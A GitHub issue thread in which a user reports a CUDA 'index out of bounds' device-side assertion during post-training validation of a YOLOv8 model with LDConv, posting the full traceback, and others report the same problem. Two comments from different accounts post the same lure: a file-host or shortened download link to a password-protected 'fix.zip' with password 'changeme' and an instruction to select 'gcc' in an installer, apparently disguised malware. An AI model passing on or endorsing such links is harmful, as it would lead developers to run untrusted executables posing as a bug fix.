### ISSUE TITLE
cuda\ScatterGatherKernel.cu:145: block: [4,0,0], thread: [63,0,0] Assertion `idx_dim >= 0 && idx_dim < index_size && "index out of bounds"` failed.

### ISSUE THREAD

**Issue by lkgGitHub** [CV-ZhangXin/LDConv#13]
环境：
Python-3.11.7 torch-2.1.2+cu121

能正常训练和验证，等跑完 epochs 数后就会报如下错误，无法继续验证
报错日志： 
`
3 epochs completed in 0.018 hours.
Optimizer stripped from runs\detect\train5\weights\last.pt, 23.0MB
Optimizer stripped from runs\detect\train5\weights\best.pt, 23.0MB

Validating runs\detect\train5\weights\best.pt...
Ultralytics YOLOv8.2.81 🚀 Python-3.11.7 torch-2.1.2+cu121 CUDA:0 (NVIDIA GeForce GTX 1080 Ti, 11264MiB)

C:\actions-runner\_work\pytorch\pytorch\builder\windows\pytorch\aten\src\ATen\native\cuda\ScatterGatherKernel.cu:145: block: [4,0,0], thread: [63,0,0] Assertion `idx_dim >= 0 && idx_dim < index_size && "index out of bounds"` failed.
YOLOv8s-LDConv summary (fused): 176 layers, 11,353,457 parameters, 0 gradients
Traceback (most recent call last):
  File "C:\github\ultralytics\00\train.py", line 94, in <module>
    results = model.train(data='aaa-128.yaml', epochs=3, batch=2)
              ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "C:\github\ultralytics\ultralytics\engine\model.py", line 813, in train
    self.trainer.train()
  File "C:\github\ultralytics\ultralytics\engine\trainer.py", line 208, in train
    self._do_train(world_size)
  File "C:\github\ultralytics\ultralytics\engine\trainer.py", line 473, in _do_train
    self.final_eval()
  File "C:\github\ultralytics\ultralytics\engine\trainer.py", line 651, in final_eval
    self.metrics = self.validator(model=f)
                   ^^^^^^^^^^^^^^^^^^^^^^^
  File "C:\Users\xxx\anaconda3\Lib\site-packages\torch\utils\_contextlib.py", line 115, in decorate_context
    return func(*args, **kwargs)
           ^^^^^^^^^^^^^^^^^^^^^
  File "C:\github\ultralytics\ultralytics\engine\validator.py", line 124, in __call__
    model = AutoBackend(
            ^^^^^^^^^^^^
  File "C:\Users\xxx\anaconda3\Lib\site-packages\torch\utils\_contextlib.py", line 115, in decorate_context
    return func(*args, **kwargs)
           ^^^^^^^^^^^^^^^^^^^^^
  File "C:\github\ultralytics\ultralytics\nn\autobackend.py", line 164, in __init__
    model.half() if fp16 else model.float()
    ^^^^^^^^^^^^
  File "C:\Users\xxx\anaconda3\Lib\site-packages\torch\nn\modules\module.py", line 1014, in half
    return self._apply(lambda t: t.half() if t.is_floating_point() else t)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "C:\github\ultralytics\ultralytics\nn\tasks.py", line 251, in _apply
    self = super()._apply(fn)
           ^^^^^^^^^^^^^^^^^^
  File "C:\Users\xxx\anaconda3\Lib\site-packages\torch\nn\modules\module.py", line 810, in _apply
    module._apply(fn)
  File "C:\Users\xxx\anaconda3\Lib\site-packages\torch\nn\modules\module.py", line 810, in _apply
    module._apply(fn)
  File "C:\Users\xxx\anaconda3\Lib\site-packages\torch\nn\modules\module.py", line 810, in _apply
    module._apply(fn)
  File "C:\Users\xxx\anaconda3\Lib\site-packages\torch\nn\modules\module.py", line 833, in _apply
    param_applied = fn(param)
                    ^^^^^^^^^
  File "C:\Users\xxx\anaconda3\Lib\site-packages\torch\nn\modules\module.py", line 1014, in <lambda>
    return self._apply(lambda t: t.half() if t.is_floating_point() else t)
                                 ^^^^^^^^
RuntimeError: CUDA error: device-side assert triggered
Compile with `TORCH_USE_CUDA_DSA` to enable device-side assertions.
`

**Comment by yiweifengyan** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by lujia121212** [comment]
你好，我也遇到了这个问题，请问您解决了吗 @lkgGitHub

**Comment by JUN-KAI-FAN** [comment]
> 环境： Python-3.11.7 torch-2.1.2+cu121
> 
> 能正常训练和验证，等跑完 epochs 数后就会报如下错误，无法继续验证 报错日志： ` 3 epochs completed in 0.018 hours. Optimizer stripped from runs\detect\train5\weights\last.pt, 23.0MB Optimizer stripped from runs\detect\train5\weights\best.pt, 23.0MB
> 
> Validating runs\detect\train5\weights\best.pt... Ultralytics YOLOv8.2.81 🚀 Python-3.11.7 torch-2.1.2+cu121 CUDA:0 (NVIDIA GeForce GTX 1080 Ti, 11264MiB)
> 
> C:\actions-runner_work\pytorch\pytorch\builder\windows\pytorch\aten\src\ATen\native\cuda\ScatterGatherKernel.cu:145: block: [4,0,0], thread: [63,0,0] Assertion `idx_dim >= 0 && idx_dim < index_size && "index out of bounds"` failed. YOLOv8s-LDConv summary (fused): 176 layers, 11,353,457 parameters, 0 gradients Traceback (most recent call last): File "C:\github\ultralytics\00\train.py", line 94, in results = model.train(data='aaa-128.yaml', epochs=3, batch=2) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ File "C:\github\ultralytics\ultralytics\engine\model.py", line 813, in train self.trainer.train() File "C:\github\ultralytics\ultralytics\engine\trainer.py", line 208, in train self._do_train(world_size) File "C:\github\ultralytics\ultralytics\engine\trainer.py", line 473, in _do_train self.final_eval() File "C:\github\ultralytics\ultralytics\engine\trainer.py", line 651, in final_eval self.metrics = self.validator(model=f) ^^^^^^^^^^^^^^^^^^^^^^^ File "C:\Users\xxx\anaconda3\Lib\site-packages\torch\utils_contextlib.py", line 115, in decorate_context return func(*args, **kwargs) ^^^^^^^^^^^^^^^^^^^^^ File "C:\github\ultralytics\ultralytics\engine\validator.py", line 124, in **call** model = AutoBackend( ^^^^^^^^^^^^ File "C:\Users\xxx\anaconda3\Lib\site-packages\torch\utils_contextlib.py", line 115, in decorate_context return func(*args, **kwargs) ^^^^^^^^^^^^^^^^^^^^^ File "C:\github\ultralytics\ultralytics\nn\autobackend.py", line 164, in **init** model.half() if fp16 else model.float() ^^^^^^^^^^^^ File "C:\Users\xxx\anaconda3\Lib\site-packages\torch\nn\modules\module.py", line 1014, in half return self._apply(lambda t: t.half() if t.is_floating_point() else t) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ File "C:\github\ultralytics\ultralytics\nn\tasks.py", line 251, in _apply self = super()._apply(fn) ^^^^^^^^^^^^^^^^^^ File "C:\Users\xxx\anaconda3\Lib\site-packages\torch\nn\modules\module.py", line 810, in _apply module._apply(fn) File "C:\Users\xxx\anaconda3\Lib\site-packages\torch\nn\modules\module.py", line 810, in _apply module._apply(fn) File "C:\Users\xxx\anaconda3\Lib\site-packages\torch\nn\modules\module.py", line 810, in _apply module._apply(fn) File "C:\Users\xxx\anaconda3\Lib\site-packages\torch\nn\modules\module.py", line 833, in _apply param_applied = fn(param) ^^^^^^^^^ File "C:\Users\xxx\anaconda3\Lib\site-packages\torch\nn\modules\module.py", line 1014, in return self._apply(lambda t: t.half() if t.is_floating_point() else t) ^^^^^^^^ RuntimeError: CUDA error: device-side assert triggered Compile with `TORCH_USE_CUDA_DSA` to enable device-side assertions. `

你好，我也遇這個問題，請問你目前解決了嗎，我發現如果手動跑驗證就不會出錯，訓練完的自動驗證才會出錯。
